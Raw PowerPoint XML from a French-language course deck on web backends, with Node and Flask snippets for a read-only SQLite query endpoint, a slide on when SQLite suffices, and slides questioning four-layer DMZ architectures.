                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>const statement = database.prepare(sql);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1200" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>const rows = statement.all();              // colonnes + lignes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1200" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t/>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Rounded Rectangle 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="2807208"/>
            <a:ext cx="10058400" cy="226771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05840" y="2807208"/>
            <a:ext cx="64008" cy="22677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207008" y="288036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Flask  ·  sqlite3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="TextBox 23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1207008" y="3118104"/>
            <a:ext cx="9729216" cy="188366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sql = normalise_select(body.get("sql"))    # même contrat</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1200" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>connection.execute("PRAGMA query_only = ON")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1200" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>cursor = connection.execute(sql)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1200" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>columns = [d[0] for d in cursor.description]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1200" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>rows = [dict(row) for row in cursor.fetchmany(100)]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1200" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t/>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="TextBox 24"/>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Ouvrez server.js ou python-flask/app.py. normaliseSelect / normalise_select : pas de ; multiple, pas d’INSERT. Comprenez le POST /api/query dans VOTRE stack. Ensuite seulement : l’apostrophe.</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40080"/>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01 · SQLite</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="932688"/>
            <a:ext cx="10058400" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="0B1220"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>SQLite : quand ça suffit, quand ça casse</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Rectangle 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="1444752"/>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627632"/>
            <a:ext cx="10058400" cy="640080"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1400" b="1">
                <a:solidFill>
                  <a:srgbClr val="0B1220"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Un fichier. Une vraie base SQL. Pas un serveur à installer.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="TextBox 17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1188720" y="2286000"/>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Lab, proto, un process</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="TextBox 18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6949440" y="2286000"/>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Oui. Python et Node l’ont déjà. seed.sql, et on avance.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="TextBox 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1188720" y="2779776"/>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Peu d’écritures, backup simple</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="TextBox 20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6949440" y="2779776"/>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Oui. Copier lab.sqlite3. Les locks tiennent.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="TextBox 21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1188720" y="3273552"/>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Plusieurs writers, HA</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="TextBox 22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6949440" y="3273552"/>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Non. Le fichier se verrouille. Postgres.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="TextBox 23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1188720" y="3767328"/>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Isoler les données du process web</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="TextBox 24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6949440" y="3767328"/>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Non. Le Node qui écoute ne doit plus voir le disque des secrets.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="TextBox 25"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="4315968"/>
            <a:ext cx="10058400" cy="640080"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1300" b="0">
                <a:solidFill>
                  <a:srgbClr val="1E293B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Pour ce cours : SQLite. En prod, le jour où un process fait tout, l’architecte arrive — slide suivant.</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69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01 · théâtre corporate</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="859536"/>
            <a:ext cx="10058400" cy="402336"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="0B1220"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>La DMZ en quatre couches. Ça impressionne. Ça fatigue.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Rectangle 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="133502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1005840" y="1481328"/>
            <a:ext cx="1733702" cy="2971800"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 6000"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FEF2F2"/>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78992" y="1645920"/>
            <a:ext cx="1605686" cy="365760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr sz="1200" b="1">
                <a:solidFill>
                  <a:srgbClr val="DC2626"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>User</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="TextBox 18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1078992" y="2121408"/>
            <a:ext cx="1605686" cy="1417320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr sz="1100" b="0">
                <a:solidFill>
                  <a:srgbClr val="1E293B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>navigateur</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Rectangle 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2766974" y="1801368"/>
            <a:ext cx="146304" cy="2331720"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0B12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2666390" y="4069080"/>
            <a:ext cx="457200" cy="256032"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr sz="900" b="1">
                <a:solidFill>
                  <a:srgbClr val="64748B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>FW</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Rounded Rectangle 21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3087014" y="1481328"/>
            <a:ext cx="1733702" cy="297180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160166" y="1645920"/>
            <a:ext cx="1605686" cy="365760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr sz="1200" b="1">
                <a:solidFill>
                  <a:srgbClr val="1D4ED8"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>DMZ 1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="TextBox 23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3160166" y="2121408"/>
            <a:ext cx="1605686" cy="1417320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr sz="1100" b="0">
                <a:solidFill>
                  <a:srgbClr val="1E293B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>front
requêtes client</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Rectangle 24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4848148" y="1801368"/>
            <a:ext cx="146304" cy="2331720"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0B12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747564" y="4069080"/>
            <a:ext cx="457200" cy="256032"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr sz="900" b="1">
                <a:solidFill>
                  <a:srgbClr val="64748B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>FW</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="Rounded Rectangle 26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5168188" y="1481328"/>
            <a:ext cx="1733702" cy="297180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241340" y="1645920"/>
            <a:ext cx="1605686" cy="365760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr sz="1200" b="1">
                <a:solidFill>
                  <a:srgbClr val="1D4ED8"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>DMZ 2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="TextBox 28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5241340" y="2121408"/>
            <a:ext cx="1605686" cy="1417320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr sz="1100" b="0">
                <a:solidFill>
                  <a:srgbClr val="1E293B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>backend
processing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="Rectangle 29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6929323" y="1801368"/>
            <a:ext cx="146304" cy="2331720"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0B12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828739" y="4069080"/>
            <a:ext cx="457200" cy="256032"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr sz="900" b="1">
                <a:solidFill>
                  <a:srgbClr val="64748B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>FW</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="Rounded Rectangle 31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7249363" y="1481328"/>
            <a:ext cx="1733702" cy="297180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322515" y="1645920"/>
            <a:ext cx="1605686" cy="365760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr sz="1200" b="1">
                <a:solidFill>
                  <a:srgbClr val="1D4ED8"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>DMZ 3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="TextBox 33"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7322515" y="2121408"/>
            <a:ext cx="1605686" cy="1417320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr sz="1100" b="0">
                <a:solidFill>
                  <a:srgbClr val="1E293B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>storage
fichiers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Rectangle 34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9010497" y="1801368"/>
            <a:ext cx="146304" cy="2331720"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0B12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909913" y="4069080"/>
            <a:ext cx="457200" cy="256032"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr sz="900" b="1">
                <a:solidFill>
                  <a:srgbClr val="64748B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>FW</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37" name="Rounded Rectangle 36"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9330537" y="1481328"/>
            <a:ext cx="1733702" cy="297180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403689" y="1645920"/>
            <a:ext cx="1605686" cy="365760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr sz="1200" b="1">
                <a:solidFill>
                  <a:srgbClr val="1D4ED8"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>DMZ 4</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39" name="TextBox 38"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9403689" y="2121408"/>
            <a:ext cx="1605686" cy="1417320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr sz="1100" b="0">
                <a:solidFill>
                  <a:srgbClr val="1E293B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>database</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40" name="TextBox 39"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="4681728"/>
            <a:ext cx="10058400" cy="1005840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1400" b="1">
                <a:solidFill>
                  <a:srgbClr val="0B1220"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Un Node qui écoute, traite, stocke et parle à la base : trop simple pour cette topologie. C’est le job de l’architecte. En pratique, plus dur pour les équipes que ça n’améliore la sécu. Ne laissez pas le CISO vous vendre sa DMZ « military grade » et ses firewalls qui ne brûlent pas assez chaud.</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5989320" cy="292608"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1200" b="1">
                <a:solidFill>
                  <a:srgbClr val="1D4ED8"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>01 · sans le jargon</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="877824"/>
            <a:ext cx="5989320" cy="420624"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="2200" b="1">
                <a:solidFill>
                  <a:srgbClr val="0B1220"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>C’est quoi, une DMZ ?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Rectangle 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="1371600"/>
            <a:ext cx="598932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517904"/>
            <a:ext cx="5989320" cy="1417320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="500"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1500" b="0">
                <a:solidFill>
                  <a:srgbClr val="1E293B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
